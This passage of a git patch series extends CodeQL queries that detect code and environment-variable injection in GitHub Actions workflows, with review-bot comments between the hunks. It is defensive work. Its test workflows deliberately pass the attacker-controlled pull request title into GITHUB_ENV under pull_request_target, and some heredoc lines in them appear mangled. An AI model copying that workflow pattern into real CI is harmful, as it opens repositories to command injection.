@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 000000000000..26f9f659a2d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file From 6c245605a754d5a43dafa11c4448b30a642e0d17 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:26:45 +0200 Subject: [PATCH 165/707] Discard already-modeled sinks --- ql/src/Security/CWE-020/CompositeActionsSinks.ql | 4 +++- ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 54f58e6b63ee..3ea9050c8322 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 2dd5bf1cfef5..5f1c54e70034 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; From 1b2e02df64938e6edca0b98b0d34f86d094e4ab9 Mon Sep 17 00:00:00 2001 
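Review bot: The exclusion in `isSink` hinges on the literal `"code-injection"` agreeing with the kind column of the rows in the generated `sinkModel` files, and the same literal is repeated in `ReusableWorkflowsSinks.ql` in the second hunk, so a rename of the kind in one place silently re-enables duplicates. A one-line comment would make the coupling visible, e.g. `// kind must match the 4th column of the generated sinkModel rows` above the new conjunct in both queries. If these two queries are what produces the generated model files, skipping already-modeled sinks also means a stale or wrong row is never regenerated; that is worth a sentence in each query's doc comment either way.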
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:18:09 +0200 Subject: [PATCH 166/707] Add support for multiline assigments --- ql/lib/codeql/actions/Ast.qll | 66 +++++++++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +++++++--- .../security/ArtifactPoisoningQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 58 +++++++++------- .../.github/workflows/multiline.yml | 29 ++++++++ ql/test/library-tests/test.ql | 4 +- .../CWE-077/.github/workflows/test4.yml | 43 ++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 6 ++ .../PrivilegedEnvVarInjection.expected | 8 +++ .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 +-- .../.github/workflows/artifactpoisoning51.yml | 4 -- .../.github/workflows/artifactpoisoning52.yml | 27 ++++++++ .../.github/workflows/artifactpoisoning53.yml | 27 ++++++++ .../CWE-829/ArtifactPoisoning.expected | 2 + 15 files changed, 265 insertions(+), 56 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bbf5c86fb957..cf5b63399f0a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -25,14 +25,17 @@ module Utils { } bindingset[line, var] - predicate extractAssignment(string line, string var, string key, string value) { + private predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | + // single line assignment assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and key = trimQuotes(assignment.splitAt("=", 0)) and value = trimQuotes(assignment.splitAt("=", 1)) or + // workflow command assignment assignment = line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and 
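Review bot: `extractLineAssignment` is made `private` inside `module Utils`, but `ql/test/library-tests/test.ql` in this same commit still calls `Utils::extractLineAssignment(t, "ENV", key, value)` in both of its hunks; as I read QL's visibility rules a private module member is not reachable from another file, so either keep it public or move the test into the module. Separately, the new `count(assignment.splitAt("=")) = 2` conjunct silently drops any assignment whose value contains `=` (URLs, base64, `--format=%H`-style command substitutions), which the previous `splitAt("=", 1)` at least truncated rather than lost; splitting on the first `=` only keeps those sinks, e.g. `key = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 1)) and` / `value = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 2))`. The enclosing `exists(...)` and the module continue in the next hunk.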
@@ -41,20 +44,59 @@ module Utils { ) } - predicate writeToGitHubEnv(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) + bindingset[var] + private string multilineAssignmentRegex(string var) { + result = + ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[var] + private string multilineBlockAssignmentRegex(string var) { + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[script, var] + private predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + } + + predicate writeToGitHubEnv(Run 
run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) } predicate writeToGitHubOutput(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", key, value) - ) + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b95..48c40b6a72c7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
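Review bot: The heredoc patterns in `multilineAssignmentRegex` and `multilineBlockAssignmentRegex` only accept a delimiter of the form `[A-Z]*EOF`, so the `echo "status<<$EOF"` / `echo "$EOF"` case that `multiline.yml` in this commit exercises appears not to match, because `$` is neither `\\s` nor `[A-Z]`; a randomised delimiter is exactly the shape hardened workflows use, so missing it is a false negative where the query matters most. The opening and closing delimiters are captured in separate groups without being required to agree, and because the flattened script is matched with greedy `.*`/`.+`, a script with two heredoc blocks may be captured as one assignment spanning both; I have not confirmed either against the test output. The `"$(" + … .splitAt("\n") + ")"` wrapping of each body line deserves a why-comment, presumably `// wrap each body line as $(...) so downstream checks written for command substitutions also see heredoc bodies — confirm`.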
@@ -36,19 +36,36 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", output, _) and - line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and succ.asExpr() = run ) } +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c192974a12b6..4a334f3440f8 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
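Review bot: In `envToRunStep` the test `value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0` rejects a value that starts with the variable reference, e.g. `echo "PR_TITLE=$TITLE" >> $GITHUB_ENV` yields `value = "$TITLE"` at index 0, so that step is lost; `>= 0` (or `exists(value.indexOf(...))`) is what is meant, and `envVarInjectionFromEnvSink` in `EnvVarInjectionQuery.qll` later in this commit repeats the same `> 0`. The sibling `envToOutputStoreStep` now uses `value.matches("%$" + … + varName + "%")` instead, where `_` in `varName` (`PR_TITLE`) is a single-character wildcard, so the two predicates also disagree on how a variable reference is recognised. One shared helper for "script value references env var" would remove both issues in one place.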
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -250,7 +250,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // eg: `echo "sha=$(> $GITHUB_ENV` Utils::writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index d216707ec861..edeea61a8713 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
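Review bot: The `ls\\s+` alternative is added to the file-read regex in `EnvVarInjectionRunStep`, but the verbatim copy of the same expression in `envVarInjectionFromFileSink` (`EnvVarInjectionQuery.qll`, next file in this commit) still has only `cat\\s+` and `<`, so the two places that decide "this env value is read from a downloaded file" now disagree. Since `EnvVarInjectionQuery.qll` already does `private import codeql.actions.security.ArtifactPoisoningQuery`, the regex could live in one predicate here, e.g. `bindingset[value]` / `predicate readsFromFile(string value) { value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) }`, with both callers using it. The enclosing class continues outside the hunk.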
@@ -5,35 +5,47 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -class EnvVarInjectionFromExprSink extends DataFlow::Node { - EnvVarInjectionFromExprSink() { - exists(Expression expr, Run run, string script, string line, string key, string value | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) and - expr = this.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) - } +predicate envVarInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string key, string value | + Utils::writeToGitHubEnv(run, key, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) } -class EnvVarInjectionFromFileSink extends DataFlow::Node { - EnvVarInjectionFromFileSink() { - exists(Run run, ArtifactDownloadStep step, string value | - this.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } +predicate envVarInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, ArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a new env var. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varName, string value | + sink.asExpr().getInScopeEnvVarExpr(varName) = expr and + run = sink.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - this instanceof EnvVarInjectionFromExprSink or - this instanceof EnvVarInjectionFromFileSink or + envVarInjectionFromExprSink(this) or + envVarInjectionFromFileSink(this) or + envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml new file mode 100644 index 000000000000..04468cb15a1d --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -0,0 +1,29 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 947757c8c3a4..fa6c430e3663 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
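Review bot: `envVarInjectionFromEnvSink` is a near-verbatim copy of `envToRunStep` from `FlowSteps.qll` earlier in this commit (same `getInScopeEnvVarExpr`, same `writeToGitHubEnv`, same `indexOf(...) > 0` test), and the two can drift exactly as the `cat`/`ls` regexes in this file and `ArtifactPoisoningQuery.qll` already have; if `FlowSteps` is reachable from here the sink could simply be `exists(DataFlow::Node pred | envToRunStep(pred, sink))`. In the same predicate `expr` is only bound and never read, so `exists(sink.asExpr().getInScopeEnvVarExpr(varName))` says the same thing without the spare variable. Turning `EnvVarInjectionFromExprSink`/`EnvVarInjectionFromFileSink` from public classes into predicates is a public API change for any query outside this diff that still names those classes; the commit message does not mention it.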
@@ -80,7 +80,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractAssignment(t, "ENV", key, value) + Utils::extractLineAssignment(t, "ENV", key, value) ) } @@ -98,6 +98,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractAssignment(t, "OUTPUT", key, value) + Utils::extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 000000000000..7fb89591b116 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -0,0 +1,43 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cbb..32379a7264f7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
@@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,5 +14,9 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c936..77db4c10344d 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,6 +14,10 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -19,3 +25,5 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index a300f4dd11ea..bf515674d903 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f025d13b1a9e..6ba7a1c714ae 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
@@ -309,8 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be 